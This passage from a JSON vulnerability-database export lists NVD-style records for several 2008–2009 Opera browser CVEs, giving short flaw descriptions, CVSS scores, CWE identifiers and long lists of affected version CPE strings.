"cpe:2.3:a:opera:opera:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:beta_3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:beta_1v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7:beta_1.2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.54:update_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Multiple buffer overflows in Opera before 9.63 might allow (1) remote attackers to execute arbitrary code via a crafted text area, or allow (2) user-assisted remote attackers to execute arbitrary code via a long host name in a file: URL. NOTE: this might overlap CVE-2008-5178.", "edition": 7, "cvss3": {}, "published": "2008-12-19T16:30:00", "title": "CVE-2008-5680", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5680"], "modified": "2018-10-11T20:56:00", "cpe": ["cpe:/a:opera:opera_browser:9.61", "cpe:/a:opera:opera_browser:8.53", "cpe:/a:opera:opera_browser:3.21", "cpe:/a:opera:opera_browser:3.62", "cpe:/a:opera:opera_browser:7.21", "cpe:/a:opera:opera_browser:6.1", "cpe:/a:opera:opera_browser:7.50", "cpe:/a:opera:opera_browser:9.27", "cpe:/a:opera:opera_browser:7.03", "cpe:/a:opera:opera_browser:5.11", "cpe:/a:opera:opera_browser:8.0", "cpe:/a:opera:opera_browser:1.00", "cpe:/a:opera:opera_browser:8.54", "cpe:/a:opera:opera_browser:7.51", "cpe:/a:opera:opera_browser:7.22", "cpe:/a:opera:opera_browser:8.50", "cpe:/a:opera:opera_browser:6.06", "cpe:/a:opera:opera_browser:9.0", "cpe:/a:opera:opera_browser:9.20", "cpe:/a:opera:opera_browser:7.20", "cpe:/a:opera:opera_browser:7.0", "cpe:/a:opera:opera_browser:3.51", "cpe:/a:opera:opera_browser:2.00", "cpe:/a:opera:opera_browser:3.50", "cpe:/a:opera:opera_browser:9.26", "cpe:/a:opera:opera_browser:2.10", "cpe:/a:opera:opera_browser:2.12", "cpe:/a:opera:opera_browser:4.02", "cpe:/a:opera:opera_browser:6.11", "cpe:/a:opera:opera_browser:9.23", "cpe:/a:opera:opera_browser:8.02", "cpe:/a:opera:opera_browser:6.02", "cpe:/a:opera:opera_browser:5.02", "cpe:/a:opera:opera_browser:5.0", "cpe:/a:opera:opera_browser:8.51", "cpe:/a:opera:opera_browser:8.01", "cpe:/a:opera:opera_browser:9.25", "cpe:/a:opera:opera_browser:6.04", "cpe:/a:opera:opera_browser:9.50", "cpe:/a:opera:opera_browser:4.01", "cpe:/a:opera:opera_browser:9.60", "cpe:/a:opera:opera_browser:6.01", "cpe:/a:opera:opera_browser:9.21", "cpe:/a:opera:opera_browser:6.03", "cpe:/a:opera:opera_browser:3.00", "cpe:/a:opera:opera_browser:9.52", "cpe:/a:opera:opera_browser:9.12", "cpe:/a:opera:opera_browser:9.24", "cpe:/a:opera:opera_browser:7.52", "cpe:/a:opera:opera_browser:7.54", "cpe:/a:opera:opera_browser:7.60", "cpe:/a:opera:opera_browser:9.62", "cpe:/a:opera:opera_browser:6.12", "cpe:/a:opera:opera_browser:9.51", "cpe:/a:opera:opera_browser:6.0", "cpe:/a:opera:opera_browser:7.10", "cpe:/a:opera:opera_browser:7.53", "cpe:/a:opera:opera_browser:3.60", "cpe:/a:opera:opera_browser:5.10", "cpe:/a:opera:opera_browser:5.12", "cpe:/a:opera:opera_browser:7.01", "cpe:/a:opera:opera_browser:9.02", "cpe:/a:opera:opera_browser:9.22", "cpe:/a:opera:opera_browser:3.10", "cpe:/a:opera:opera_browser:8.52", "cpe:/a:opera:opera_browser:3.61", "cpe:/a:opera:opera_browser:9.10", "cpe:/a:opera:opera_browser:9.01", "cpe:/a:opera:opera_browser:4.00", "cpe:/a:opera:opera_browser:6.05", "cpe:/a:opera:opera_browser:7.02", "cpe:/a:opera:opera_browser:7.11", "cpe:/a:opera:opera_browser:7.23"], "id": "CVE-2008-5680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5680", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera_browser:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.27:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1_v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:beta:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:beta:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Unspecified vulnerability in Opera before 9.63 allows remote attackers to \"reveal random data\" via unknown vectors.", "edition": 7, "cvss3": {}, "published": "2008-12-19T16:30:00", "title": "CVE-2008-5683", "type": "cve", "cwe": ["NVD-CWE-noinfo", "CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5683"], "modified": "2012-06-07T17:18:00", "cpe": ["cpe:/a:opera:opera_browser:9.61", "cpe:/a:opera:opera_browser:8.53", "cpe:/a:opera:opera_browser:3.21", "cpe:/a:opera:opera_browser:3.62", "cpe:/a:opera:opera_browser:7.21", "cpe:/a:opera:opera_browser:6.1", "cpe:/a:opera:opera_browser:7.50", "cpe:/a:opera:opera_browser:9.27", "cpe:/a:opera:opera_browser:7.03", "cpe:/a:opera:opera_browser:5.11", "cpe:/a:opera:opera_browser:8.0", "cpe:/a:opera:opera_browser:1.00", "cpe:/a:opera:opera_browser:8.54", "cpe:/a:opera:opera_browser:7.51", "cpe:/a:opera:opera_browser:7.22", "cpe:/a:opera:opera_browser:8.50", "cpe:/a:opera:opera_browser:6.06", "cpe:/a:opera:opera_browser:9.0", "cpe:/a:opera:opera_browser:9.20", "cpe:/a:opera:opera_browser:7.20", "cpe:/a:opera:opera_browser:7.0", "cpe:/a:opera:opera_browser:3.51", "cpe:/a:opera:opera_browser:2.00", "cpe:/a:opera:opera_browser:3.50", "cpe:/a:opera:opera_browser:9.26", "cpe:/a:opera:opera_browser:2.10", "cpe:/a:opera:opera_browser:2.12", "cpe:/a:opera:opera_browser:4.02", "cpe:/a:opera:opera_browser:6.11", "cpe:/a:opera:opera_browser:9.23", "cpe:/a:opera:opera_browser:8.02", "cpe:/a:opera:opera_browser:6.02", "cpe:/a:opera:opera_browser:5.02", "cpe:/a:opera:opera_browser:5.0", "cpe:/a:opera:opera_browser:8.51", "cpe:/a:opera:opera_browser:8.01", "cpe:/a:opera:opera_browser:9.25", "cpe:/a:opera:opera_browser:6.04", "cpe:/a:opera:opera_browser:9.50", "cpe:/a:opera:opera_browser:4.01", "cpe:/a:opera:opera_browser:9.60", "cpe:/a:opera:opera_browser:6.01", "cpe:/a:opera:opera_browser:9.21", "cpe:/a:opera:opera_browser:6.03", "cpe:/a:opera:opera_browser:3.00", "cpe:/a:opera:opera_browser:9.52", "cpe:/a:opera:opera_browser:9.12", "cpe:/a:opera:opera_browser:9.24", "cpe:/a:opera:opera_browser:7.52", "cpe:/a:opera:opera_browser:7.54", "cpe:/a:opera:opera_browser:7.60", "cpe:/a:opera:opera_browser:9.62", "cpe:/a:opera:opera_browser:6.12", "cpe:/a:opera:opera_browser:9.51", "cpe:/a:opera:opera_browser:6.0", "cpe:/a:opera:opera_browser:7.10", "cpe:/a:opera:opera_browser:7.53", "cpe:/a:opera:opera_browser:3.60", "cpe:/a:opera:opera_browser:5.10", "cpe:/a:opera:opera_browser:5.12", "cpe:/a:opera:opera_browser:7.01", "cpe:/a:opera:opera_browser:9.02", "cpe:/a:opera:opera_browser:9.22", "cpe:/a:opera:opera_browser:3.10", "cpe:/a:opera:opera_browser:8.52", "cpe:/a:opera:opera_browser:3.61", "cpe:/a:opera:opera_browser:9.10", "cpe:/a:opera:opera_browser:9.01", "cpe:/a:opera:opera_browser:4.00", "cpe:/a:opera:opera_browser:6.05", "cpe:/a:opera:opera_browser:7.02", "cpe:/a:opera:opera_browser:7.11", "cpe:/a:opera:opera_browser:7.23"], "id": "CVE-2008-5683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5683", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:opera:opera_browser:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.27:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1_v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:beta:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:beta:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:03", "description": "Heap-based buffer overflow in Opera 9.62 on Windows allows remote attackers to execute arbitrary code via a long file:// URI. NOTE: this might overlap CVE-2008-5680.", "edition": 3, "cvss3": {}, "published": "2008-11-20T15:30:00", "title": "CVE-2008-5178", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5178"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:opera:opera:9.62"], "id": "CVE-2008-5178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5178", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera:9.62:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:17", "description": "Opera before 9.64 allows remote attackers to execute arbitrary code via a crafted JPEG image that triggers memory corruption.", "edition": 6, "cvss3": {}, "published": "2009-03-16T19:30:00", "title": "CVE-2009-0914", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 